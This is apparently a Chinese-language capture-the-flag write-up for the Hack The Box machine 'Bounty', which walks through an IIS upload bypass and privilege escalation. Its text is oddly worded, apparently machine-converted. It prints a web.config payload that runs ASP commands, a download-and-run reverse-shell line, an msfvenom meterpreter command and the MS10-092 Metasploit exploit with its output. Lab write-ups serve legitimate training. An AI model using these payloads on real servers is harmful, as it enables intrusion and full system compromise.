免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务发现
┌──(rootkali)-[~/htb/Bounty]└─# nmap -sV -Pn 10.10.10.93 -p- 1 ⨯Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-16 22:37 ESTNmap scan report for 10.10.10.93Host is up (0.27s latency).Not shown: 65534 filtered portsPORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 7.5Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 360.04 seconds目录爆破
└─# gobuster dir -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -x aspx ===============================================================Gobuster v3.1.0by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://10.10.10.93[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/Web-Content/common.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.1.0[+] Timeout: 10s===============================================================2021/12/16 22:44:15 Starting gobuster in directory enumeration mode===============================================================/transfer.aspx (Status: 200)/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]/uploadedfiles (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/] ===============================================================2021/12/16 22:46:25 Finished===============================================================transfer.aspx是一个文件上传页面
所有胜利上传的文件都会到uploadedfiles下,不过这个目录下的文件过一段时间(几十秒)就会被删除
应用burpsuite,截断上传页面信息,应用intruder,爆破扩展名,发现容许上传的扩展名包含:gif,jpg,png,config
查了下IIS7.5下有一个畸形解析破绽,然而如同无奈复现
试过传图片码,各种截断,然而如同无奈绕过
在谷歌上搜寻IIS httpd 7.5 upload rce
找到了这篇文章
能够上传一个web.config文件,在正文里执行asp代码
<?xml version="1.0" encoding="UTF-8"?><configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> <appSettings></appSettings></configuration><!–-<% Response.write("-"&"->")Response.write("<pre>")Set wShell1 = CreateObject("WScript.Shell")Set cmd1 = wShell1.Exec("ipconfig")output1 = cmd1.StdOut.Readall()set cmd1 = nothing: Set wShell1 = nothingResponse.write(output1)Response.write("</pre><!-"&"-") %>-–>下面文件上传当前拜访http://10.10.10.93/uploadedfiles/web.config胜利打印ipconfig命令
Windows IP ConfigurationEthernet adapter Local Area Connection: Connection-specific DNS Suffix . : IPv4 Address. . . . . . . . . . . : 10.10.10.93 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.10.10.2Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : 上面咱们筹备一个反弹shell,把github上的这个脚本下载到本地,并且在脚本最下方退出一行代码:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 4242
把web.config编辑成以下payload
<?xml version="1.0" encoding="UTF-8"?><configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> <appSettings></appSettings></configuration><!–-<% Response.write("-"&"->")Response.write("<pre>")Set wShell1 = CreateObject("WScript.Shell")Set cmd1 = wShell1.Exec("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.3/Invoke-PowerShellTcp.ps1')")output1 = cmd1.StdOut.Readall()set cmd1 = nothing: Set wShell1 = nothingResponse.write(output1)Response.write("</pre><!-"&"-") %>-–>在本地开启一个http服务,筹备传送Invoke-PowerShellTcp.ps1
python3 -m http.server 80
kali开启监听接管反弹shell
nc -lnvp 4242
上传当前,关上http://10.10.10.93/uploadedfiles/web.config页面,拿到初始shell
┌──(rootkali)-[~/htb/Bounty]└─# nc -lnvp 4242 listening on [any] 4242 ...connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49158Windows PowerShell running as user BOUNTY$ on BOUNTYCopyright (C) 2015 Microsoft Corporation. All rights reserved.PS C:\windows\system32\inetsrv>whoamibounty\merlin拿到了初始shell
然而无奈找到user.txt
提权
webshell不太稳固,咱们编译一个稳固的meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > shell64.exe
在靶机顺次执行上面两行代码,把shell下载到靶机
$client = new-object System.Net.WebClient
$client.DownloadFile('http://10.10.14.3:8000/shell6...', 'C:\users\merlin\Desktop\shell64.exe')
powershell执行exe文件
&"C:\users\merlin\Desktop\shell64.exe"
拿到meterpreter当前,把winPEAS.bat 传到靶机,枚举提权破绽
"Microsoft Windows Server 2008 R2 Datacenter " [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat) MS11-080 patch is NOT installed XP/SP3,2K3/SP3-afd.sys) MS16-032 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon) MS11-011 patch is NOT installed XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa) MS10-59 patch is NOT installed 2K8,Vista,7/SP0-Chimichurri) MS10-21 patch is NOT installed 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel) MS10-092 patch is NOT installed 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched) MS10-073 patch is NOT installed XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout) MS17-017 patch is NOT installed 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading) MS10-015 patch is NOT installed 2K,XP,2K3,2K8,Vista,7-User Mode to Ring) MS08-025 patch is NOT installed 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys) MS06-049 patch is NOT installed 2K/SP4-ZwQuerySysInfo) MS06-030 patch is NOT installed 2K,XP/SP2-Mrxsmb.sys) MS05-055 patch is NOT installed 2K/SP4-APC Data-Free) MS05-018 patch is NOT installed 2K/SP3/4,XP/SP1/2-CSRSS) MS04-019 patch is NOT installed 2K/SP2/3/4-Utility Manager) MS04-011 patch is NOT installed 2K/SP2/3/4,XP/SP0/1-LSASS service BoF) MS04-020 patch is NOT installed 2K/SP4-POSIX) MS14-040 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer) MS16-016 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address) MS15-051 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys) MS14-070 patch is NOT installed 2K3/SP2-TCP/IP) MS13-005 patch is NOT installed Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast) MS13-053 patch is NOT installed 7SP0/SP1_x86-schlamperei) MS13-081 patch is NOT installed 7SP0/SP1_x86-track_popup_menu) 能够看见靶机很多补丁没有装置,一一枚举,应用MS10-092
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > search MS10-092Matching Modules================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege EscalationInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/local/ms10_092_schelevator提权
msf6 exploit(windows/local/ms10_092_schelevator) > run[*] Started reverse TCP handler on 10.10.14.3:4444 [*] Preparing payload at C:\Windows\TEMP\AoTizOUxSB.exe[*] Creating task: LXJM4TwyEqICqyv[*] SUCCESS: The scheduled task "LXJM4TwyEqICqyv" has successfully been created.[*] SCHELEVATOR[*] Reading the task file contents from C:\Windows\system32\tasks\LXJM4TwyEqICqyv...[*] Original CRC32: 0x866f314a[*] Final CRC32: 0x866f314a[*] Writing our modified content back...[*] Validating task: LXJM4TwyEqICqyv[*] [*] Folder: \[*] TaskName Next Run Time Status [*] ======================================== ====================== ===============[*] LXJM4TwyEqICqyv 1/1/2022 5:38:00 AM Ready [*] SCHELEVATOR[*] Disabling the task...[*] SUCCESS: The parameters of scheduled task "LXJM4TwyEqICqyv" have been changed.[*] SCHELEVATOR[*] Enabling the task...[*] SUCCESS: The parameters of scheduled task "LXJM4TwyEqICqyv" have been changed.[*] SCHELEVATOR[*] Executing the task...[*] Sending stage (175174 bytes) to 10.10.10.93[*] SUCCESS: Attempted to run the scheduled task "LXJM4TwyEqICqyv".[*] SCHELEVATOR[*] Deleting the task...[*] Meterpreter session 2 opened (10.10.14.3:4444 -> 10.10.10.93:49175) at 2021-12-20 22:38:40 -0500[*] SUCCESS: The scheduled task "LXJM4TwyEqICqyv" was successfully deleted.[*] SCHELEVATORmeterpreter > getuidServer username: NT AUTHORITY\SYSTEM曾经拿到SYSTEM权限,至此咱们能够读取零碎内任何文件。
user.txt在普通用户权限下无奈查看到,然而在system下是能够的。
meterpreter > search -f user.txtFound 1 result... c:\Users\merlin\Desktop\user.txt (32 bytes)meterpreter > search -f root.txtFound 1 result... c:\Users\Administrator\Desktop\root.txt (32 bytes)